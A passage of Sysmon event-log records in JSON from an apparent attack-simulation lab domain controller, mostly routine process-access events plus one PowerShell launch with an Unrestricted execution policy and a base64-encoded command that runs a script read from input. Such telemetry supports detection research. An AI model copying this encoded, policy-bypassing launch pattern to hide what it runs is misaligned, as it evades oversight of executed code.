{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.078\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032E-5F25-0000-0010B8550A00}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.078","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032E-5F25-0000-0010B8550A00}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:46.081\r\nProcessGuid: {A837DB8D-032E-5F25-0000-001085560A00}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032E-5F25-0000-0010B8550A00}\r\nParentProcessId: 4324\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:46.081","ProcessGuid":"{A837DB8D-032E-5F25-0000-001085560A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032E-5F25-0000-0010B8550A00}","ParentProcessId":"4324","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcA